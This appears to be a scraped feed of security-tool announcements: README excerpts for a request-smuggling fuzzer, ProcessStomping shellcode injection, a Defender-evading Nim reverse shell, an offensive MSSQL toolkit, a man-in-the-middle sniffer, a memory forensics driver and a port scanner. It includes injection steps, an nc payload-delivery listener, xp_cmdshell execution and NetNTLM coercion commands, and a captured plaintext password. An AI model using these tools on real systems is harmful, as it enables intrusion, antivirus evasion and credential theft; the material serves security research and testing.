knowsmore --user-pass --username administrator --password Sec4US@2023 --company sec4us

Integrate all cracked credentials into the Neo4j BloodHound database

knowsmore --bloodhound --mark-owned 10.10.10.10 -d neo4j -u neo4j -p 123456

For remote connections, make sure the Neo4j database server accepts remote connections. Change the line below in the config file /etc/neo4j/neo4j.conf and restart the service.

server.bolt.listen_address=0.0.0.0:7687


CLZero - A Project For Fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors

By: Zion3R


A project for fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors.

About

Thank you to @albinowax, @defparam and @d3d, without whom this tool would not exist. Inspired by the tool Smuggler; all attack gadgets were adapted from Smuggler and https://portswigger.net/research/how-to-turn-security-research-into-profit

For more info see: https://moopinger.github.io/blog/fuzzing/clzero/tools/request/smuggling/2023/11/15/Fuzzing-With-CLZero.html


Usage

usage: clzero.py [-h] [-url URL] [-file FILE] [-index INDEX] [-verbose] [-no-color] [-resume] [-skipread] [-quiet] [-lb] [-config CONFIG] [-method METHOD]

CLZero by Moopinger

optional arguments:
-h, --help show this help message and exit
-url URL (-u), Single target URL.
-file FILE (-f), Files containing multiple targets.
-index INDEX (-i), Index start point when using a file list. Default is first line.
-verbose (-v), Enable verbose output.
-no-color Disable colors in HTTP Status
-resume Resume scan from last index place.
-skipread Skip the read response on smuggle requests, recommended. This will save a lot of time between requests. Ideal for targets with standard HTTP traffic.
-quiet (-q), Disable output. Only successful payloads will be written to ./payloads/
-lb Last byte sync method for least request latency. Due to the nature of the request, it cannot guarantee that the smuggle request will be processed first. Ideal for targets with a high
amount of traffic, and you do not mind sending multiple requests.
-config CONFIG (-c) Config file to load, see ./configs/ to create custom payloads
-method METHOD (-m) Method to use when sending the smuggle request. Default: POST

single target attack:

  • python3 clzero.py -u https://www.target.com/ -c configs/default.py -skipread

  • python3 clzero.py -u https://www.target.com/ -c configs/default.py -lb

Multi target attack:

  • python3 clzero.py -f urls.txt -c configs/default.py -skipread

  • python3 clzero.py -f urls.txt -c configs/default.py -lb

Install

git clone https://github.com/Moopinger/CLZero.git
cd CLZero
pip3 install -r requirements.txt


ProcessStomping - A Variation Of ProcessOverwriting To Execute Shellcode On An Executable'S Section

By: Zion3R


A variation of ProcessOverwriting to execute shellcode on an executable's section

What is it

For a more detailed explanation you can read my blog post

Process Stomping is a variation of hasherezade's Process Overwriting, and it has the advantage of writing a shellcode payload to a targeted section instead of writing a whole PE payload over the hosting process address space.

These are the main steps of the ProcessStomping technique:

  1. CreateProcess - setting the Process Creation Flag to CREATE_SUSPENDED (0x00000004) in order to suspend the process's primary thread.
  2. WriteProcessMemory - used to write the malicious shellcode to the target process section.
  3. SetThreadContext - used to point the entry point to the new code section that has been written.
  4. ResumeThread - self-explanatory.

As an example application of the technique, the PoC can be used with sRDI to load a beacon dll over an executable RWX section. The following picture describes the steps involved.


Disclaimer

All information and content is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.

Credits

This work has been made possible because of the knowledge and tools shared by Aleksandra Doniec @hasherezade and Nick Landers.

Usage

Select your target process and modify global variables accordingly in ProcessStomping.cpp.

Compile the sRDI project making sure that the offset is enough to jump over your generated sRDI shellcode blob and then update the sRDI tools:

cd \sRDI-master

python .\lib\Python\EncodeBlobs.py .\

Generate a Reflective-Loaderless dll payload of your choice and then generate sRDI shellcode blob:

python .\lib\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll

The shellcode blob can then be XORed with a keyword and downloaded using a simple socket

python xor.py noRLx86.bin noRLx86_enc.bin Bangarang
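xor.py is not included in this excerpt; a minimal sketch of such a repeating-key XOR encoder, matching the arguments shown above (input file, output file, key), could be:

# Sketch of a repeating-key XOR encoder (usage: xor.py <in> <out> <key>).
import itertools
import sys

data = open(sys.argv[1], "rb").read()
key = itertools.cycle(sys.argv[3].encode())
open(sys.argv[2], "wb").write(bytes(b ^ k for b, k in zip(data, key)))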

Deliver the XORed blob upon connection

nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin

The sRDI blob will get erased after execution to remove unneeded artifacts.

Caveats

To successfully execute this technique you should select the right target process and use a dll payload that doesn't come with a User Defined Reflective loader.

Detection opportunities

Process Stomping technique requires starting the target process in a suspended state, changing the thread's entry point, and then resuming the thread to execute the injected shellcode. These are operations that might be considered suspicious if performed in quick succession and could lead to increased scrutiny by some security solutions.



OpenSSH 9.6p1

This is a Linux/portable port of OpenBSD's excellent OpenSSH. OpenSSH is based on the last free version of Tatu Ylonen's SSH with all patent-encumbered algorithms removed, all known security bugs fixed, new features reintroduced, and many other clean-ups.

Linpmem - A Physical Memory Acquisition Tool For Linux

By: Zion3R


Like its Windows counterpart, Winpmem, this is not a traditional memory dumper. Linpmem offers an API for reading from any physical address, including reserved memory and memory holes, but it can also be used for normal memory dumping. Furthermore, the driver offers a variety of access modes to read physical memory, such as byte, word, dword, qword, and buffer access mode, where buffer access mode is appropriate in most standard cases. If reading requires an aligned byte/word/dword/qword read, Linpmem will do precisely that.

Currently, the Linpmem features:

  1. Read from physical address (access mode byte, word, dword, qword, or buffer)
  2. CR3 info service (specify target process by pid)
  3. Virtual to physical address translation service

Cache control is to be added in the future to support the specialized read access modes.


Building the kernel driver

At least for now, you must compile the Linpmem driver yourself. A method to load a precompiled Linpmem driver on other Linux systems is under development but not finished yet. That said, compiling the Linpmem driver is not difficult; basically, it's executing 'make'.

Step 1 - getting the right headers

You need make and a C compiler. (We recommend gcc, but clang should work as well).

Make sure that you have the linux-headers installed (using whatever package manager your target linux distro has). The exact package name may vary on your distribution. A quick (distro-independent) way to check if you have the package installed:

ls -l /usr/lib/modules/`uname -r`/

That's it, you can proceed to step 2.

Foreign system: Currently, if you want to compile the driver for another system, e.g., because you want to create a memory dump but can't compile on the target, you have to download the header package directly from the package repositories of that system's Linux distribution. Double-check that the package version exactly matches the release and kernel version running on the foreign system. In case the other system is using a self-compiled kernel you have to obtain a copy of that kernel's build directory. Then, place the location of either directory in the KDIR environment variable.

export KDIR=path/to/extracted/header/package/or/kernel/root

Step 2 - make

Compiling the driver is simple, just type:

make

This should produce linpmem.ko in the current working directory.

You might want to check precompiler.h beforehand and choose whether to compile for release or debug (e.g., with debug printing). There aren't many other precompiler settings right now.

Loading The Driver

The linpmem.ko module can be loaded by using insmod path-to-linpmem.ko, and unloaded with rmmod path-to-linpmem.ko. (This will load the driver only for this uptime.) If you compiled for debug, also take a look at dmesg.

After loading, for talking to the driver, you need to create the device:

mknod /dev/linpmem c 42 0

If you can't talk to the driver, check the dmesg log to verify that '42' was indeed the registered major:

[12827.900168] linpmem: registered chrdev with major 42

Usually, though, the kernel will indeed assign this number.

You can use chown on the device to give it to your user, if you do not want to have a root console open all the time. (Or just keep using it in a root console.)
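For example (the user name is a placeholder; the device name comes from the mknod step above):

chown youruser /dev/linpmem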

  • Watch dmesg output. Please report errors if you see any!
  • Warning: if there is a dmesg error print from Linpmem telling to reboot, better do it immediately.
  • Warning: this is an early version.

Usage

Demo Code

There is an example code demonstrating and explaining (in detail) how to interact with the driver. The user-space API reference can furthermore be found in ./userspace_interface/linpmem_shared.h.

  1. cd demo
  2. gcc -o test test.c
  3. (sudo) ./test // <= you need sudo if you did not use chown on the device.

This code is important, if you want to understand how to directly interact with the driver instead of using a library. It can also be used as a short function test.

Command Line Interface Tool

There is an (optional) basic command line interface tool to Linpmem, the pmem CLI tool. It can be found here: https://github.com/vobst/linpmem-cli. Aside from the source code, there is also a precompiled CLI tool as well as the precompiled static library and headers that can be found here (signed). Note: this is a preliminary version, be sure to check for updates, as many additions and enhancements will follow soon.

The pmem CLI tool can be used for testing the various functions of Linpmem in a (relatively) safe and convenient manner. Linpmem can also be loaded by this tool instead of using insmod/rmmod, with some extra options planned for future releases. This also has the advantage that pmem auto-creates the right device for you for immediate use. It is extremely portable and runs on any Linux system (and, in fact, has even been tested on a Linux 2.6 kernel).

$ ./pmem -h
Command-line client for the linpmem driver

Usage: pmem [OPTIONS] [COMMAND]

Commands:
insmod Load the linpmem driver
help Print this message or the help of the given subcommand(s)

Options:
-a, --address <ADDRESS> Address for physical read operations
-v, --virt-address <VIRT_ADDRESS> Translate address in target process' address space (default: current process)
-s, --size <SIZE> Size of buffer read operations
-m, --mode <MODE> Access mode for read operations [possible values: byte, word, dword, qword, buffer]
-p, --pid <PID> Target process for cr3 info and virtual-to-physical translations
--cr3 Query cr3 value of target process (default: current process)
--verbose Display debug output
-h, --help Print help (see more with '--help')
-V, --version Print version

If you want to compile the CLI tool yourself, change to its directory and follow the instructions in the (cli) Readme to build it. Otherwise, just download the prebuilt program; it should work on any Linux. To load the kernel driver with the CLI tool:

# pmem insmod path/to/linpmem.ko

The advantage of using the pmem tool to load the driver is that you do not have to create the device file yourself, and (in future releases) it will offer a choice of who owns the linpmem device.

Libraries

The pmem command line interface is only a thin wrapper around a small Rust library that exposes an API for interfacing with the driver. More advanced users can also use this library. The library is automatically compiled (as static portable library) along with the pmem cli tool when compiling from https://github.com/vobst/linpmem-cli, but also included (precompiled) here (signed). Note: this is a preliminary version, more to follow soon.

If you do not want to use the usermode library and prefer to interface with the driver directly on your own, you can find its user-space API/interface and documentation in ./userspace_interface/linpmem_shared.h. We also provide example code in demo/test.c that explains how to use the driver directly.

Memdumping tool

Not implemented yet.

Tested Linux Distributions

  • Debian, self-compiled 6.4.X, Qemu/KVM, not paravirtualized.
    • PTI: off/on
  • Debian 12, Qemu/KVM, fully paravirtualized.
    • PTI: on
  • Ubuntu server, Qemu/KVM, not paravirtualized.
    • PTI: on
  • Fedora 38, Qemu/KVM, fully paravirtualized.
    • PTI: on
  • Baremetal Linux test, AMI BIOS: Linux 6.4.4
    • PTI: on
  • Baremetal Linux test, HP: Linux 6.4.4
    • PTI: on
  • Baremetal, Arch[-hardened], Dell BIOS, Linux 6.4.X
  • Baremetal, Debian, 6.1.X
  • Baremetal, Ubuntu 20.04 with Secure Boot on. Works, but sign driver first.
  • Baremetal, Ubuntu 22.04, Linux 6.2.X

Handling Secure Boot

If the system reports the following error message when loading the module, it might be because of secure boot:

$ sudo insmod linpmem.ko
insmod: ERROR: could not insert module linpmem.ko: Operation not permitted

There are different ways to still load the module. The obvious one is to disable secure boot in your UEFI settings.

If your distribution supports it, a more elegant solution would be to sign the module before using it. This can be done using the following steps (tested on Ubuntu 20.04).

  1. Install mokutil:
    $ sudo apt install mokutil
  2. Create the signing key material:
    $ openssl req -new -newkey rsa:4096 -keyout mok-signing.key -out mok-signing.crt -outform DER -days 365 -nodes -subj "/CN=Some descriptive name/"
    Make sure to adjust the options to your needs. Especially, consider the key length (-newkey), the validity (-days), the option to set a key pass phrase (-nodes; leave it out, if you want to set a pass phrase), and the common name to include into the certificate (-subj).
  3. Register the new MOK:
    $ sudo mokutil --import mok-signing.crt
    You will be asked for a password, which is required in the following step. Consider using a password that you can type on a US keyboard layout.
  4. Reboot the system. It will enter a MOK enrollment menu. Follow the instructions to enroll your new key.
  5. Sign the module. Once the MOK is enrolled, you can sign your module:
    $ /usr/src/linux-headers-$(uname -r)/scripts/sign-file sha256 path/to/mok-signing.key path/to/mok-signing.crt path/to/linpmem.ko

After that, you should be able to load the module.

Note that from a forensic-readiness perspective, you should prepare a signed module before you need it, as the system will reboot twice during the process described above, destroying most of your volatile data in memory.

Known Issues

  • Huge page read is not implemented. Linpmem recognizes a huge page and rejects the read, for now.
  • Reading from mapped io and DMA space will be done with CPU caching enabled.
  • No locks are taken during the page table walk. This might lead to funny results when concurrent modifications are going on. This is a general and (mostly unsolvable) problem of reading live RAM without halting the entire OS.
  • Secure Boot (Ubuntu): please sign your driver prior to using.
  • Any CPU-powered memory encryption, e.g., AMD SME, Intel SGX/TDX, ...
  • Pluton chips?

(Please report potential issues if you encounter anything.)

Under work

  • Loading precompiled driver on any Linux.
  • Processor cache control. Example: for uncached reading of mapped I/O and DMA space.

Future work

  • Arm/Mips support. (far future work)
  • Legacy kernels (such as 2.6), unix-based kernels

Acknowledgements

Linpmem, as well as Winpmem, would not exist without the work of our predecessors of the (now retired) REKALL project: https://github.com/google/rekall.

  • We would like to thank Mike Cohen and Johannes StΓΌttgen for their pioneer work and open source contribution on PTE remapping, a technique which is still in use 10 years later.

Our open source contributors:

  • Viviane Zwanger
  • Valentin Obst


PipeViewer - A Tool That Shows Detailed Information About Named Pipes In Windows

By: Zion3R


A GUI tool for viewing Windows Named Pipes and searching for insecure permissions.

The tool was published as part of a research about Docker named pipes:
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 1"
"Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 2"

Overview

PipeViewer is a GUI tool that allows users to view details about Windows Named pipes and their permissions. It is designed to be useful for security researchers who are interested in searching for named pipes with weak permissions or testing the security of named pipes. With PipeViewer, users can easily view and analyze information about named pipes on their systems, helping them to identify potential security vulnerabilities and take appropriate steps to secure their systems.
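
For a quick sense of what the tool enumerates, the live named pipe namespace can also be listed from Python on Windows by reading the special \\.\pipe\ directory (a minimal sketch for orientation only; PipeViewer itself is a .NET GUI built on NtApiDotNet and shows far richer per-pipe detail):

# Minimal sketch: enumerate currently open named pipes on Windows.
import os

for name in sorted(os.listdir(r"\\.\pipe")):
    print(rf"\\.\pipe\{name}")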


Usage

Double-click the EXE binary and you will get the list of all named pipes.

Build

We used Visual Studio to compile it.
When downloading it from GitHub, you might get errors about blocked files; you can use PowerShell to unblock them:

Get-ChildItem -Path 'D:\tmp\PipeViewer-main' -Recurse | Unblock-File

Warning

We built the project and uploaded it so you can find it in the releases.
One problem is that the binary will trigger alerts from Windows Defender because it uses the NtObjectManager package, which is flagged as a virus.
Note that James Forshaw talked about it here.
We can't change this because we depend on a third-party DLL.

Features

  • A detailed overview of named pipes.
  • Filter\highlight rows based on cells.
  • Bold specific rows.
  • Export\Import to\from JSON.
  • PipeChat - create a connection with available named pipes.

Demo

PipeViewer3_v1.0.mp4

Credit

We want to thank James Forshaw (@tyranid) for creating the open source NtApiDotNet which allowed us to get information about named pipes.

License

Copyright (c) 2023 CyberArk Software Ltd. All rights reserved
This repository is licensed under Apache-2.0 License - see LICENSE for more details.

References

For more comments, suggestions or questions, you can contact Eviatar Gerzi (@g3rzi) and CyberArk Labs.



I2P 2.4.0

I2P is an anonymizing network, offering a simple layer that identity-sensitive applications can use to securely communicate. All data is wrapped with several layers of encryption, and the network is both distributed and dynamic, with no trusted parties. This is the source code release version.

PySQLRecon - Offensive MSSQL Toolkit Written In Python, Based Off SQLRecon

By: Zion3R


PySQLRecon is a Python port of the awesome SQLRecon project by @sanjivkawa. See the commands section for a list of capabilities.


Install

PySQLRecon can be installed with pip3 install pysqlrecon or by cloning this repository and running pip3 install .

Commands

All of the main modules from SQLRecon have equivalent commands. Commands noted with [PRIV] require elevated privileges or sysadmin rights to run. Alternatively, commands marked with [NORM] can likely be run by normal users and do not require elevated privileges.

Support for impersonation ([I]) or execution on linked servers ([L]) are denoted at the end of the command description.

adsi                 [PRIV] Obtain ADSI creds from ADSI linked server [I,L]
agentcmd             [PRIV] Execute a system command using agent jobs [I,L]
agentstatus          [PRIV] Enumerate SQL agent status and jobs [I,L]
checkrpc             [NORM] Enumerate RPC status of linked servers [I,L]
clr                  [PRIV] Load and execute .NET assembly in a stored procedure [I,L]
columns              [NORM] Enumerate columns within a table [I,L]
databases            [NORM] Enumerate databases on a server [I,L]
disableclr           [PRIV] Disable CLR integration [I,L]
disableole           [PRIV] Disable OLE automation procedures [I,L]
disablerpc           [PRIV] Disable RPC and RPC Out on linked server [I]
disablexp            [PRIV] Disable xp_cmdshell [I,L]
enableclr            [PRIV] Enable CLR integration [I,L]
enableole            [PRIV] Enable OLE automation procedures [I,L]
enablerpc            [PRIV] Enable RPC and RPC Out on linked server [I]
enablexp             [PRIV] Enable xp_cmdshell [I,L]
impersonate          [NORM] Enumerate users that can be impersonated
info                 [NORM] Gather information about the SQL server
links                [NORM] Enumerate linked servers [I,L]
olecmd               [PRIV] Execute a system command using OLE automation procedures [I,L]
query                [NORM] Execute a custom SQL query [I,L]
rows                 [NORM] Get the count of rows in a table [I,L]
search               [NORM] Search a table for a column name [I,L]
smb                  [NORM] Coerce NetNTLM auth via xp_dirtree [I,L]
tables               [NORM] Enumerate tables within a database [I,L]
users                [NORM] Enumerate users with database access [I,L]
whoami               [NORM] Gather logged in user, mapped user and roles [I,L]
xpcmd                [PRIV] Execute a system command using xp_cmdshell [I,L]

Usage

PySQLRecon has global options (available to any command), with some commands introducing additional flags. All global options must be specified before the command name:

pysqlrecon [GLOBAL_OPTS] COMMAND [COMMAND_OPTS]

View global options:

pysqlrecon --help

View command specific options:

pysqlrecon [GLOBAL_OPTS] COMMAND --help

Change the database authenticated to, or used in certain PySQLRecon commands (query, tables, columns, rows), with the --database flag.

Target execution of a PySQLRecon command on a linked server (instead of the SQL server being authenticated to) using the --link flag.

Impersonate a user account while running a PySQLRecon command with the --impersonate flag.

--link and --impersonate are incompatible.

Development

pysqlrecon uses Poetry to manage dependencies. Install from source and setup for development with:

git clone https://github.com/tw1sm/pysqlrecon
cd pysqlrecon
poetry install
poetry run pysqlrecon --help

Adding a Command

PySQLRecon is easily extensible - see the template and instructions in resources

TODO

  • Add SQLRecon SCCM commands
  • Add Azure SQL DB support?

References and Credits



MacMaster - MAC Address Changer

By: Zion3R


MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.

Features

  • Custom MAC Address: Set a specific MAC address to your network interface.
  • Random MAC Address: Generate and set a random MAC address.
  • Reset to Original: Reset the MAC address to its original hardware value.
  • Custom OUI: Set a custom Organizationally Unique Identifier (OUI) for the MAC address.
  • Version Information: Easily check the version of MacMaster you are using.

Installation

MacMaster requires Python 3.6 or later.

  1. Clone the repository:
    $ git clone https://github.com/HalilDeniz/MacMaster.git
  2. Navigate to the cloned directory:
    cd MacMaster
  3. Install the package:
    $ python setup.py install

Usage

$ macmaster --help         
usage: macmaster [-h] [--interface INTERFACE] [--version]
[--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]

MacMaster: Mac Address Changer

options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Network interface to change MAC address
--version, -V Show the version of the program
--random, -r Set a random MAC address
--newmac NEWMAC, -nm NEWMAC
Set a specific MAC address
--customoui CUSTOMOUI, -co CUSTOMOUI
Set a custom OUI for the MAC address
--reset, -rs Reset MAC address to the original value

Arguments

  • --interface, -i: Specify the network interface.
  • --random, -r: Set a random MAC address.
  • --newmac, -nm: Set a specific MAC address.
  • --customoui, -co: Set a custom OUI for the MAC address.
  • --reset, -rs: Reset MAC address to the original value.
  • --version, -V: Show the version of the program.
  1. Set a specific MAC address:
    $ macmaster.py -i eth0 -nm 00:11:22:33:44:55
  2. Set a random MAC address:
    $ macmaster.py -i eth0 -r
  3. Reset MAC address to its original value:
    $ macmaster.py -i eth0 -rs
  4. Set a custom OUI:
    $ macmaster.py -i eth0 -co 08:00:27
  5. Show program version:
    $ macmaster.py -V

Replace eth0 with your desired network interface.
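
For intuition, here is a rough sketch of how a random MAC address with an optional custom OUI can be composed (an illustration only; MacMaster's actual implementation may differ):

# Sketch: build a random MAC address, optionally keeping a fixed OUI
# (the vendor prefix, e.g. "08:00:27"). Illustrative, not MacMaster's code.
import random

def random_mac(oui=None):
    if oui:
        head = oui.lower().split(":")
    else:
        # Set the locally-administered bit and clear the multicast bit
        # in the first octet, as MAC changers typically do.
        first = (random.randint(0, 255) & 0b11111100) | 0b00000010
        head = [f"{first:02x}", f"{random.randint(0, 255):02x}",
                f"{random.randint(0, 255):02x}"]
    tail = [f"{random.randint(0, 255):02x}" for _ in range(3)]
    return ":".join(head + tail)

print(random_mac())            # fully random, locally administered
print(random_mac("08:00:27"))  # random NIC part under a fixed OUI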

Note

You must run this script as root, or with sudo, for it to work properly, because changing a MAC address requires root privileges.

Contributing

Contributions are welcome! To contribute to MacMaster, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

For any inquiries or further information, you can reach me through the following channels:




NetworkSherlock - Powerful And Flexible Port Scanning Tool With Shodan

By: Zion3R


NetworkSherlock is a powerful and flexible port scanning tool designed for network security professionals and penetration testers. With its advanced capabilities, NetworkSherlock can efficiently scan IP ranges, CIDR blocks, and multiple targets. It stands out with its detailed banner grabbing capabilities across various protocols and integration with Shodan, the world's premier service for scanning and analyzing internet-connected devices. This Shodan integration enables NetworkSherlock to provide enhanced scanning capabilities, giving users deeper insights into network vulnerabilities and potential threats. By combining local port scanning with Shodan's extensive database, NetworkSherlock offers a comprehensive tool for identifying and analyzing network security issues.


Features

  • Scans multiple IPs, IP ranges, and CIDR blocks.
  • Supports port scanning over TCP and UDP protocols.
  • Detailed banner grabbing feature.
  • Ping check for identifying reachable targets.
  • Multi-threading support for fast scanning operations.
  • Option to save scan results to a file.
  • Provides detailed version information.
  • Colorful console output for better readability.
  • Shodan integration for enhanced scanning capabilities.
  • Configuration file support for Shodan API key.

Installation

NetworkSherlock requires Python 3.6 or later.

  1. Clone the repository:
    git clone https://github.com/HalilDeniz/NetworkSherlock.git
  2. Install the required packages:
    pip install -r requirements.txt

Configuration

Update the networksherlock.cfg file with your Shodan API key:

[SHODAN]
api_key = YOUR_SHODAN_API_KEY
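
For reference, the kind of enrichment the Shodan integration implies can be sketched with the official shodan Python package (illustrative only, not NetworkSherlock's internals; it assumes a valid API key like the one configured above):

# Sketch: look up what Shodan already knows about a host.
import shodan

api = shodan.Shodan("YOUR_SHODAN_API_KEY")
host = api.host("8.8.8.8")                 # query by IP address
print(host.get("org"), host.get("os"))
for item in host.get("data", []):          # one entry per observed service
    print(item["port"], item.get("product", ""))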

Usage

python3 networksherlock.py --help
usage: networksherlock.py [-h] [-p PORTS] [-t THREADS] [-P {tcp,udp}] [-V] [-s SAVE_RESULTS] [-c] target

NetworkSherlock: Port Scan Tool

positional arguments:
target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5,
192.168.1.0/24)

options:
-h, --help show this help message and exit
-p PORTS, --ports PORTS
Ports to scan (e.g. 1-1024, 21,22,80, or 80)
-t THREADS, --threads THREADS
Number of threads to use
-P {tcp,udp}, --protocol {tcp,udp}
Protocol to use for scanning
-V, --version-info Used to get version information
-s SAVE_RESULTS, --save-results SAVE_RESULTS
File to save scan results
-c, --ping-check Perform ping check before scanning
--use-shodan Enable Shodan integration for additional information

Basic Parameters

  • target: The target IP address(es), IP range, or CIDR block to scan.
  • -p, --ports: Ports to scan (e.g., 1-1000, 22,80,443).
  • -t, --threads: Number of threads to use.
  • -P, --protocol: Protocol to use for scanning (tcp or udp).
  • -V, --version-info: Obtain version information during banner grabbing.
  • -s, --save-results: Save results to the specified file.
  • -c, --ping-check: Perform a ping check before scanning.
  • --use-shodan: Enable Shodan integration.

Example Usage

Basic Port Scan

Scan a single IP address on default ports:

python networksherlock.py 192.168.1.1

Custom Port Range

Scan an IP address with a custom range of ports:

python networksherlock.py 192.168.1.1 -p 1-1024

Multiple IPs and Port Specification

Scan multiple IP addresses on specific ports:

python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443

CIDR Block Scan

Scan an entire subnet using CIDR notation:

python networksherlock.py 192.168.1.0/24 -p 80

Using Multi-Threading

Perform a scan using multiple threads for faster execution:

python networksherlock.py 192.168.1.1-192.168.1.5 -p 1-1024 -t 20

Scanning with Protocol Selection

Scan using a specific protocol (TCP or UDP):

python networksherlock.py 192.168.1.1 -p 53 -P udp

Scan with Shodan

python networksherlock.py 192.168.1.1 --use-shodan

Scan Multiple Targets with Shodan

python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443 -V --use-shodan

Banner Grabbing and Save Results

Perform a detailed scan with banner grabbing and save results to a file:

python networksherlock.py 192.168.1.1 -p 1-1000 -V -s results.txt
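
Conceptually, banner grabbing just connects to an open port and reads whatever the service volunteers first. A minimal sketch of the idea behind the -V flag (an illustration; NetworkSherlock's implementation may differ):

# Sketch: grab the first bytes a TCP service sends after connect.
import socket

def grab_banner(host, port, timeout=3):
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                return s.recv(1024).decode(errors="replace").strip()
            except socket.timeout:
                return ""   # open port, but no banner offered
    except OSError:
        return None         # closed, filtered, or unreachable

print(grab_banner("10.0.2.12", 21))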

Ping Check Before Scanning

Scan an IP range after performing a ping check:

python networksherlock.py 10.0.0.1-10.0.0.255 -c

OUTPUT EXAMPLE

$ python3 networksherlock.py 10.0.2.12 -t 25 -V -p 21-6000
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21-6000
Threads : 25
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
21 /tcp open telnet 220 (vsFTPd 2.3.4)
80 /tcp open http HTTP/1.1 200 OK
139 /tcp open netbios-ssn %SMBr
25 /tcp open smtp 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
23 /tcp open smtp #' #'
445 /tcp open microsoft-ds %SMBr
514 /tcp open shell
512 /tcp open exec Where are you?
1524/tcp open ingreslock root@metasploitable:/#
2121/tcp open iprop 220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.0.2.12]
3306/tcp open mysql >
5900/tcp open unknown RFB 003.003
53 /tcp open domain
---------------------------------------------

Output Example

$ python3 networksherlock.py 10.0.2.0/24 -t 10 -V -p 21-1000
********************************************
Scanning target: 10.0.2.1
Scanning IP : 10.0.2.1
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
53 /tcp open domain
********************************************
Scanning target: 10.0.2.2
Scanning IP : 10.0.2.2
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
445 /tcp open microsoft-ds
135 /tcp open epmap
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
21 /tcp open ftp 220 (vsFTPd 2.3.4)
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
23 /tcp open telnet #'
80 /tcp open http HTTP/1.1 200 OK
53 /tcp open kpasswd 464/udpcp
445 /tcp open domain %SMBr
3306/tcp open mysql >
********************************************
Scanning target: 10.0.2.20
Scanning IP : 10.0.2.20
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9

Contributing

Contributions are welcome! To contribute to NetworkSherlock, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact



Nim-Shell - Reverse Shell That Can Bypass Windows Defender Detection

By: Zion3R


Reverse shell that can bypass Windows Defender detection


$ apt install nim

Compilation

nim c -d:mingw --app:gui nimshell.nim

Change the IP address and port number you want to listen on in the nimshell.nim file, according to your setup.

Then start a listener:

 $ nc -nvlp 4444


American Fuzzy Lop plus plus 4.09c

Google's American Fuzzy Lop is a brute-force fuzzer coupled with an exceedingly simple but rock-solid instrumentation-guided genetic algorithm. afl++ is a superior fork to Google's afl. It has more speed, more and better mutations, more and better instrumentation, custom module support, etc.

PacketSpy - Powerful Network Packet Sniffing Tool Designed To Capture And Analyze Network Traffic

By: Zion3R


PacketSpy is a powerful network packet sniffing tool designed to capture and analyze network traffic. It provides a comprehensive set of features for inspecting HTTP requests and responses, viewing raw payload data, and gathering information about network devices. With PacketSpy, you can gain valuable insights into your network's communication patterns and troubleshoot network issues effectively.


Features

  • Packet Capture: Capture and analyze network packets in real-time.
  • HTTP Inspection: Inspect HTTP requests and responses for detailed analysis.
  • Raw Payload Viewing: View raw payload data for deeper investigation.
  • Device Information: Gather information about network devices, including IP addresses and MAC addresses.

Installation

git clone https://github.com/HalilDeniz/PacketSpy.git

Requirements

PacketSpy requires the following dependencies to be installed:

pip install -r requirements.txt

Getting Started

To get started with PacketSpy, use the following command-line options:

root@denizhalil:/PacketSpy# python3 packetspy.py --help                          
usage: packetspy.py [-h] [-t TARGET_IP] [-g GATEWAY_IP] [-i INTERFACE] [-tf TARGET_FIND] [--ip-forward] [-m METHOD]

options:
-h, --help show this help message and exit
-t TARGET_IP, --target TARGET_IP
Target IP address
-g GATEWAY_IP, --gateway GATEWAY_IP
Gateway IP address
-i INTERFACE, --interface INTERFACE
Interface name
-tf TARGET_FIND, --targetfind TARGET_FIND
Target IP range to find
--ip-forward, -if Enable packet forwarding
-m METHOD, --method METHOD
Limit sniffing to a specific HTTP method

Examples

  1. Device Detection
root@denizhalil:/PacketSpy# python3 packetspy.py -tf 10.0.2.0/24 -i eth0

Device discovery
**************************************
Ip Address Mac Address
**************************************
10.0.2.1 52:54:00:12:35:00
10.0.2.2 52:54:00:12:35:00
10.0.2.3 08:00:27:78:66:95
10.0.2.11 08:00:27:65:96:cd
10.0.2.12 08:00:27:2f:64:fe

  2. Man-in-the-Middle Sniffing
root@denizhalil:/PacketSpy# python3 packetspy.py -t 10.0.2.11 -g 10.0.2.1 -i eth0
******************* started sniff *******************

HTTP Request:
Method: b'POST'
Host: b'testphp.vulnweb.com'
Path: b'/userinfo.php'
Source IP: 10.0.2.20
Source MAC: 08:00:27:04:e8:82
Protocol: HTTP
User-Agent: b'Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0'

Raw Payload:
b'uname=admin&pass=mysecretpassword'

